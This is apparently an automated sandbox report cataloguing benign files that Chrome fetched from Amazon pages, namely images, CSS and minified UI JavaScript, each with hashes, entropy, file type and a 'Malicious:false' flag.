                                                                                                                                                                                                                                                                SHA-512:C8636B35DF266BDB5CAA6FDDC60A91F7D27623EB74305850394BA17965AF1DE632C4F9B7ACC4BF51B5980E6FE2000B92414BEBE68FC92BD5A968D7FAE38CBED7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-MmY4MjkxOWIt-w186._SY116_CB642007527_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................."......".$...$.6*&&*6>424>LDDL_Z_||.............................."......".$...$.6*&&*6>424>LDDL_Z_||.......t...."..........5...................................................................................W.*...+B..X."e...l.......5...o|=.+....n...m.5........k.*....y~xKW..G..O.g.........d..j.Z.....-.z..?.2.l|.>.(....O.03.~`...r.eg..>...<.%.-.fU..M=..<}........fQ..{.A.8....N......t..o2......]t....<....<..............N...........................!t.."%12@Qq.$0A.......#456ars.......&37CPRSVcdu..........?...V...0.nrFi.y..9..l.w.#(...S."....2.aJ+1.....1.|M....j5y...Oua..8......5..1...S..BO.2.....m..j8..S.}..M-.%n.s..q.h.>9.U..Y..V..}.Z.2..(8..3.r.[3.J<..iv.[P..a.2C.h.~.77W.zXv....Y...Ur:3!..`..y....i7qE.R.:M..<..-<...q.hX.....9.P....Q..TP.t.-..Q`>,..J.......C.R...LT.*.......P=..Ll.g.Sj.(..vLa....^....]9...B.!m>.v7.......1>.5LZ_w+..]...&....?.s`........9.Q..b.NW`.....[{0...j...=cT^..=...Qc`s<........Q.k.u...+I..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2599
                                                                                                                                                                                                                                                                Entropy (8bit):7.4797659436131365
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0ra1UQDbZ/3rk+X4+PxeJb0zr2urG9gtjJA6pKnGvzvucj2:TuKZ/7k+X4yeOzKmARnGs
                                                                                                                                                                                                                                                                MD5:91799B048794C7648425963CD57D0F15
                                                                                                                                                                                                                                                                SHA1:27339F1115632EDCC144D099BFBF7FC32C57420E
                                                                                                                                                                                                                                                                SHA-256:8FDE50FF2908EBDB8D7EE4983578E16CB17E049F75C0CD82B0ED588285098722
                                                                                                                                                                                                                                                                SHA-512:D3E22165C37A033EC0E3122570EF6FF141765F559F35C5278257F6274596ABF490E5493213D378A693E3B2C51FFB07E1AB6FAA4BCC590C3EE7779B341E7E76C9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/61NFkX7td8L._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1..3Aq."2Qars..4B....#R...6Sdt..................................................1.".!2.34B............?............../n.gB..OF.')xA93@6.].........WB. ....zR...c-..V..........>1...}.t..jW..v.W.au.J.X...9.}.RH...n..5M..b...B@............................A..h...V...8.y...,....})t...z..a.]u.......zS4.ij*.U:|.........^..K.{O.R.....k...-&..qF~*.R...v....k.T,.o7.Wx.:..............................ys[.....S:.S.....l.t.R....H....t.....w.c...N.S..[.^.g...Vt..r.p......DX.,..h.....i:..No....<....v^:..kuB.....oW1.V.c~.....V..........P..........................rzeJ.N.<.Uk..{).6...5..z...r.;.T....J{.I../..^.cNJ..i.8.Xhz..9Vt.=.......o.l.-...q.A.r........{.N4Ri3..m...C.".../...Z..J..kSq|.......5.SMJ./{.q..KS..w.nTgM..%...L.6....$[.W...tO...Q.z..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5558
                                                                                                                                                                                                                                                                Entropy (8bit):7.689235400200449
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TxJo3zZj2JoM6C1WYStDK/qY0T19aO4QTgzwGJanNJv68LArj5L9ye5gzXitRWbU:CdjkBWhG50T19t48TAGfv9cf59t5gGRZ
                                                                                                                                                                                                                                                                MD5:72C50260AC982A7A2BC98D95A8823A8D
                                                                                                                                                                                                                                                                SHA1:2E43167C7300BF9C5102C74F1E98B6401ED48103
                                                                                                                                                                                                                                                                SHA-256:688A0D60EE3EE23E0A80DC7113E2E4B141D15ED8972CED5C409BCC8A6CEB33D8
                                                                                                                                                                                                                                                                SHA-512:29A14800B3F5373FFBDCAE9EE5A0DEC40FBF7F97FDD20D9FDAAC38B3C7B3EE692762DA70D2A12ED1BAA8F061EC5E74CF019C0B263764264390189D21C14D8F4F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........1..............................................................X.......1..c..6w..:.9y;n.I...}........K.[........................}^>..h.]D.m...E:.6..R.F....Vw...Ps...c ..............v?..U2..8.[..o.3,..>...o. n0.r..F+..0.k......Ga.............."...|..G%..e.S8.N.....M.Sz...l-.5..A#.....*.V.z...............o|Xt.k.v...\.'..Wi-.m..h7...WS.p...8V..v.Y.w&..?.............y...R..R...d...;...nTf..u.!U....Y\,...d[P..kz[. ...........t.=.:...3ev...e...,.%..U.U]Ui....8d...y..............:....<N&g.X...e.Wl.[U......i.n.....evA...'.ze.................7N<.bd.!2.k.[....Fq..........*....g.A......Q.............m.I.....!9.qe.Z.[U....Ou7.SuUEV.U.+.8.N2>.._6.(7..............F<.8...2Jq.YmW-..il.(..U..]MQU...pHc*..3..2.S.s ...........B.....L.%(.'u7-..ql.(..n)......2.V+2......A@............>.p1..w...8N'u6...qu.Xf..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (12670), with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):12670
                                                                                                                                                                                                                                                                Entropy (8bit):4.754877085064918
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:YiwsJxNArHaBwcPNGXtGPrXgJjYWHKwatR2Z:TZCaicP1pWqnt4
                                                                                                                                                                                                                                                                MD5:C22C1A63E37A5A7C744B7BC69C46F1D1
                                                                                                                                                                                                                                                                SHA1:A70F7D7046A33113545AE6E7A9E820B91B10DDFF
                                                                                                                                                                                                                                                                SHA-256:3C0695AF3E6D88F5B045BBE9780CF6FF59631CD0CE7E4719132075E57260D998
                                                                                                                                                                                                                                                                SHA-512:919A489957FDC0D2DD128912B864162EB7C6647B5DB6C08B95F073ECC0A1B7F9887511249FB7ABA3ACFA4AD86BDF9BD3C415CED351D62CCC4A2DD16D65A80FA5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/31MfUzZkHxL.css?AUIClients/F3CommonCartAssets&yMRr+P3v
                                                                                                                                                                                                                                                                Preview:.sc-localmarket-cart .sc-carts-expand-link{float:right;position:relative;top:50%;-webkit-transform:translateY(-50%);-moz-transform:translateY(-50%);-ms-transform:translateY(-50%);-o-transform:translateY(-50%);transform:translateY(-50%);margin-left:32px}.sc-localmarket-cart .sc-carts-expand-link .a-icon{margin-left:0}.sc-localmarket-cart a.sc-collapsed-item-thumbnails{text-decoration:none}#sc-localmarket-item-update-message{position:fixed;top:0;left:0;right:0;z-index:500;background-color:#EBFAEB;margin:0;padding:10px 20px;transition-timing-function:ease-out}#localMarketRecommendations{position:relative}.sc-group-category-title{border-radius:4px;margin-left:8px;margin-right:8px;margin-bottom:8px;padding:0;background-color:#fff}.sc-localmarket-cart.sc-localmarket-collapsed-cart .sc-collapsed-cart-link{border:0}.sc-localmarket-cart.sc-localmarket-collapsed-cart .sc-collapsed-item-list{display:inline-block;overflow:hidden;height:100px;margin-top:35px;margin-right:20px}.sc-localmarket-cart.s
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4925
                                                                                                                                                                                                                                                                Entropy (8bit):7.911589478645616
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TP4coqzbbbSGbbvfnB2xGj/m1gkx+nOD31yl6T/Gvb:zCqzbbbDbbnnB24jO+m+nOD31rm
                                                                                                                                                                                                                                                                MD5:ACDEF47A0B4252D3A8B2102FA28554B0
                                                                                                                                                                                                                                                                SHA1:2BD14B10991AD2DB5C8CE6C2F63A8F966E51C39D
                                                                                                                                                                                                                                                                SHA-256:C5D550ECCE276D1F03BC6C068C482E484F06ABE4312252EF5FF270B034CF7CD0
                                                                                                                                                                                                                                                                SHA-512:72E51862C2BBCB48312A9F337200B4FB99BAB7A09E3C15F8EA53B30F980F1BCCC54CD877E9ED7CFC8AEBC0A60A3ECE37C9C531EDA7D4B3B9902400D983F3DD08
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1a..."2AQq....br...#3BR.....Cs....4c..$S................................................!.1"A23BQ............?..D@DD.D@DD.D@DD.-:..m..+-Z..-.G}.W.&0{Gp..<.{gN...N.TZ.D*.7...3`...`.x:.z.xY.:..6>.S..x...#...^28)...].e..v....q.C.......].w....E.f.F.sD1.=....-.r...).+.S./....rx.x.@DD.D@DD.D@DD.D@DD.D@DD.D@DD.D@VzKoC..um.Q..."..\2ok.A^.i...'.e.....i....<.-...vj.Z.W_.....;....z../VZ1`A..m..M.t.....v.....v.z.......).(jj\..V.....\..I....f......\EuN.[..."..w..<O jk...u..Q...............................66..7..I:....,.v.i.....q.....H.)+.m,...%.....W.C...d[o..#...T.c9.G|..r..!.A.""...6...0._$M.3..Z.}...WXuvk.t.....(..].,M..c..p ..r+.85....U6L.ET..................................hzk...O0N.5M...oV3.X...J...c.Q....z.\.t..|........3.{%...m4<?h.I.I&.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4808
                                                                                                                                                                                                                                                                Entropy (8bit):7.820342546816429
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:CGrRauHiehWrS/ClXr4JJT83OaRJ+IsQRemI95Dk/BNtnD5RAF8Y1hdkG:CGrwu1hWrcYc983ZDvLJI95Dk/XtNRWp
                                                                                                                                                                                                                                                                MD5:F845FD6A178FAD94B6B8A4B70E2D08F3
                                                                                                                                                                                                                                                                SHA1:05E3C0FB5CC29D2BC8F4A05545E19F8E3814ACFC
                                                                                                                                                                                                                                                                SHA-256:8811E0EF510E5E4858B22C1A865F15B674B57992DC448F57E49AC73B11A78965
                                                                                                                                                                                                                                                                SHA-512:DBE81FEE4732E2B3C2B265F444E6ABDCBDA9225DD59C054DDB7326B8B6581E4483D120BB21CA2392BAABA95CAA36BF2565708137F0EB5F09A150C3117D0683F3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1740513_3911878_186x116_1X_en_AE._SY116_CB566464918_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................t...."..........7......................................................................i....$........g.......(Q..d.qtzqxb...5{.<...qwh2../.......4..G......?.\V..=..I..3=.....Uk...5......[.{....8.......8z..}fO..!J..&%...>M...Z..T...7...Hv..W9Y..........E.b..72:C.=.AQ.G.i.c.....5.h#..V.N......S.C........i~.....h ... .u.A..R.J.u.`.J..l.....z...........r..<-.7<...O=.|x...7....9....y...5.,+.P.............?...,.............................0..!"1. #P3BQ...........)....~.. b...%Ym..k.Y.=..f.k\d.y%.p..V..$......sVL7!.......)....(....j.-#....S..b.J.CM~q..9......F.....Y.N...8....#.......%...q......2;.".q.Q..h..I...|.g..%./$...}.c0.wY.U........!.S.....mG[Z.vN.IL...(....K.......U1..%HR.w.D..j..[{&.{.#....J......=L....Invl...h.*B.q2....0.B..H.j5._....!...?.../.+N....kd........0z.....j.c...n...A..$a..,.b.u|
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (609)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):26743
                                                                                                                                                                                                                                                                Entropy (8bit):5.347138627237308
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:f1It/R8qLTNor9iviwO2AMVdnjnTzyFVBIXO6ZkLvnP7w2VxLQ/E2pNeHmnqjUYR:acmgkJVd/zMV56ZkLvxVx8fXoKA
                                                                                                                                                                                                                                                                MD5:ABC38D8868C37FAF892916C89A4E5FBC
                                                                                                                                                                                                                                                                SHA1:469738064CD0AEABAE8B4DAA2B679B587310134A
                                                                                                                                                                                                                                                                SHA-256:FA8ED1F8E3AE60AB5AE81058050107B99A2AE4E5A34192BBAE3E41D35EC2693F
                                                                                                                                                                                                                                                                SHA-512:158840D371AF384897DC3E11E2634F35FEFC895756A31CD4CFAE91325561EFF5CAF5CD4F125A16642BCD2AE6D5073467BF5390B63704A3DC84ED8525FB84C4BC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(e){var k=window.AmazonUIPageJS||window.P,l=k._namespace||k.attributeErrors,f=l?l("AmazonHomepageCardAssets",""):k;f.guardFatal?f.guardFatal(e)(f,window):f.execute(function(){e(f,window)})})(function(e,k,l){e.register("gw-video-orchestrator",function(){function f(a,b,g){return 0<a?Math.min(g-a,b-a):0<b?Math.min(b,g):0}function n(a){var b=k.innerHeight||document.documentElement.clientHeight,g=k.innerWidth||document.documentElement.clientWidth;a=a.getBoundingClientRect();var b=f(a.top,a.bottom,.b),g=f(a.left,a.right,g),c=0;if(0<b||0<g)c=b*g;return Math.min(1,Math.max(0,c/((a.bottom-a.top)*(a.right-a.left))))}function p(a,b){return a&&1===a.nodeType&&(a.offsetWidth||a.offsetHeight||a.getClientRects().length)?n(a)<b?!1:!0:!1}function m(a){a=q(a);a!==c&&(c&&c.callback(!1),(c=a)&&"hidden"!==document.visibilityState&&c.callback(!0))}function q(a){if(a)for(var b=d.length;b--;)if(d[b].element===a)return d[b]}function r(a,b){return b.priority-a.priority||n(b.element)-n(a.element)||(a.el
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3030
                                                                                                                                                                                                                                                                Entropy (8bit):7.8440249204193355
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6gQeKWD+tqlOdqhiK2jMlBMPZgTiEU93kpMPWGYVppMVX+E3ofOffNYcUYtN:ToQiqql7L2jxWTiEU95WGYW1j3hNYcvn
                                                                                                                                                                                                                                                                MD5:DAAA6DC15D970C9853EE63CD843E84F6
                                                                                                                                                                                                                                                                SHA1:4832EF5D60E7F15796FCA8956E7C08B676BE47E8
                                                                                                                                                                                                                                                                SHA-256:E7350D94E6050847DC6D4A3CFAD7B161751D2E592D68ED72CBBC2088FE0532D6
                                                                                                                                                                                                                                                                SHA-512:5E94312EC7B301D0B7846B9E47A9562C1100864AD402861933F89512D0AF5FB2174A300AC5AD069EB2D15C00F6A07DB140688BA5EB661EFE7D93B0D8E402FB19
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/XCM_Manual_Coupons_DQC_44b7c125-ee97-441e-9257-50452eb12b8c._SY116_CB613590867_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!1...Q"2Aq....#Ba..CRTr....$%d......................................................1..!Q."aq..AS..............?......H&""....z....D.."2I.DE..2........rBi..)Rj..fIzz.I?.....*L........U(=?Yb..e8..I+*".`.@....P.(...`,..t..K.~~r.D..MRH.$M.Y.dI..@...&&..=v.%....Fp.V....r34.......KG.Z..1.>..[[.t.g(.18.~..H.....x......D.......>.../..;DN6{.....Y..'P.=.V.[.aAi..).frx.8...WA.J....t.....F.r.7...Y=...K!Fd`C/*F...........?.cG+.36I..?....>.V./..`..._..=..`B.fl..&.g.Ks.t>.....o.}...+R4...G.).k....(T..S.......O...2.E.6.K..W...."".....f.-....OS..P.......v.8.U.sE...#....R8a...QyF..qV........*.....3gL..S.g....t9k.u.....'..3..A..........-xl..|0&..\...'..:}J........g....7.g......;Kc.*H..c-..nZ..v.}...S..r..7Tk...KtSO^Y..K..........z.Q@U4.#6.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 1242x450, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):75195
                                                                                                                                                                                                                                                                Entropy (8bit):7.946534329781733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:RXSWGoABiLlDQojo7D2HlNDMEYXOTKh78THTbmBswUzDk:A58ZHo7DArxQOmAHG+wUM
                                                                                                                                                                                                                                                                MD5:51C7A37369F3ED4CCB7A6D978D6E1985
                                                                                                                                                                                                                                                                SHA1:5392F7A1106DB043FEFD1BA06E40FFF2828191E9
                                                                                                                                                                                                                                                                SHA-256:361D4833A692EF980C9232401EB1F063F7675D158B3862BE09ED6CA3FDAF00D8
                                                                                                                                                                                                                                                                SHA-512:858B181A1F2D906EC1EF3D66F5ADC4D49037BD3AA181B6B382CD04FE2654F163A26D2A7EF03AD7DCF13AAA8F0C66F9B11506A9C898364A89386A3996EEFD2FAD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......Exif..MM.*.......i...........................({"systemName":"Freeway","id":"XCM_Manual_1333288_AE_MH_CN_DailyEssentials_En_1242x450_62250f37-4d8f-4ca3-8029-f242b1e6c9f3.jpg"}.....Ducky.......2......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:6698c714-4270-4d04-aaa6-be4b260bfa70" xmpMM:DocumentID="xmp.did:9AB536AEB67C11EBB17BEC042ECF912E" xmpMM:InstanceID="xmp.iid:9AB536ADB67C11EBB17BEC042ECF912E" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:de39bb07-faff-48c1-b476-2ef570d6b8e7" stRef:documentID="adobe:docid
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):14709
                                                                                                                                                                                                                                                                Entropy (8bit):7.925318763360946
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:tV2APkk/CXMgJziOsGGNHhkigYJEFq6VLMyP9:tQAPkqaGhhnDyFq6VLMG9
                                                                                                                                                                                                                                                                MD5:EECE3D1066DEF31C5F3CC7DE5563433B
                                                                                                                                                                                                                                                                SHA1:8D58C3B4FC3645DA063E0B7F880FF8F00D13C61C
                                                                                                                                                                                                                                                                SHA-256:6B7EEC8CFE73A022D041C0EFA4E57E71E20DF2FC6A79CC599FDD48ADE6C79749
                                                                                                                                                                                                                                                                SHA-512:CE63506A20D524319261910BF3D05B296001A39FA7D27E1C02347BD3DF3410E439E3EE7F5D95916837405C9084651CD9B07556CA49467FA86A2ACD62E52CAC23
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5..............................................................................g....z"#......................>.3.qS....!.dq.F............)..../.}D...J.......s.2.zR..@..<.{.$.p...>.................^`p..>`.c)..ys...,..i....v.F>..mk.dxBo....s^..._8N.25.@........ol../.......<.....a.oq...2..\5.0.Z_.M...&.9..8^i:...W.fZ..V9.`....n.R...@.....)Z......y..&...;.y.n......q.\.E+L...~].b.iN.....w..2.]..mw.s..8.@.......L.G.a..........B:...Kk<.+N.....d...\)2i..17..|.=...9..D....g...I.7.5......w.<.g.m.D.D.}..S..q...F.m9.!7p..................2Vw..z.2'9.w.2&.U..}...g.YZ..L..5yl=4bf./.:.2C2..@....n.7s4.k...,..C.d....9....8zZ.;...q..%...........V._....<.>.l."=.....Wq\...:.3%....,....J.........{'m.......#~.C..!..j.ZC..... ........S......Jp...1...Pe09...X...I^......B.5M..5\....&7.6O.d.E...w&
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):7731
                                                                                                                                                                                                                                                                Entropy (8bit):7.902263256040312
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:c5YfkXTb9SrZkixBY2PvFD7A67e00cOJvuw:c5MkXTRSdkiA23FnA6DAZX
                                                                                                                                                                                                                                                                MD5:C7DAA631689883C30262432EF79733CB
                                                                                                                                                                                                                                                                SHA1:CB8055A864D11B78A19099AABFDD07894B889195
                                                                                                                                                                                                                                                                SHA-256:9DD65A195E96222DFA27C5A8AC7438B4EBFE36509192530888D5CF9106227F43
                                                                                                                                                                                                                                                                SHA-512:5D05E80A421156D238C4B23F545697A6E4D3585AF393DEBC8333372602A71C038BF45ABDF205140525A35634670E2E2577E3848CC2BEB9210B9A611C637DCFE5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`.............hf....-fl............."4.....f..>.5.m...K{....aJQ.R.....1..Fh...S.G.......w.U..2.......BW.c`...k.ee.k>..h.......m........D5z..Q../#.sB.....g.5...^.,...G.......K....q...n....z.....f...<....}M.w..u..c...c........$z8.....q..1..c/.QF(.....D|.7j.5sr...._B..h.J.1..6...SSd..\...^3.^.w.2P.K....#..d.p\a#|..Q...n.g..>....~EM.E..:2./._5u)|........5...4....&o_..B.B.9...6.k.h.+G..gq..L.|NS...tno..Oc.ie.j..+.?...{.Wv.q.... .k.~.}?..:.........-....s...wN.t.1..N.7#U...|...-..q.>.K....dk.K7ue.kD.s.'c.s.i....<c...#.-..03.@+..O8...W.7../.v...6.}3.;-.>.g....7.+..,}..........-"}.OA..P.......N\i._ke..d.h.Z\.-.H................0............................!1.#02 "34@A..$`CQ..............b{....o..6!..5.........?&.!....`1H...]x..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):215
                                                                                                                                                                                                                                                                Entropy (8bit):4.97423508161732
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:2LGDtF4IzO/Bqkhab4KYK7vfITow+1MRR1anMAuLhtI:2Q3JC/BVab4NK7vftjMzI
                                                                                                                                                                                                                                                                MD5:2115ADCB9BE68682D036FDD4BB9BCFB0
                                                                                                                                                                                                                                                                SHA1:4EA836ED7D69B815680D0A419BA4FFE1E1DCFD55
                                                                                                                                                                                                                                                                SHA-256:51BF16CE55A5D6EA57A258B90F7ACBF586CE94A8770EA55860D345BB821BD2F5
                                                                                                                                                                                                                                                                SHA-512:B1F0F9613CDFD0A08149779686CF185B1AB8FE514FC6CD89B5B6AF08D894006DBAA31D8916EE90B83517983575ADE235EDA8E5482C388A94678390A331F793EA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/01WZHXMa0NL.js?AUIClients/CartComparisonAssets
                                                                                                                                                                                                                                                                Preview:(function(c){var b=window.AmazonUIPageJS||window.P,d=b._namespace||b.attributeErrors,a=d?d("CartComparisonAssets",""):b;a.guardFatal?a.guardFatal(c)(a,window):a.execute(function(){c(a,window)})})(function(c,b,d){});
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):39588
                                                                                                                                                                                                                                                                Entropy (8bit):7.951269065390308
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:8wTP7nctQ5TQWIMdy2B7rptNxyY1skUA0Vvn3ZnajvK8mVrqYygr1X5r:TPwmXQ0HTNxym0V3ZnajS8mZxr
                                                                                                                                                                                                                                                                MD5:A3E2EDBF849F0DA6A7B6B70E617363BB
                                                                                                                                                                                                                                                                SHA1:B8568511F38B26012815EE56BC63072A2306E759
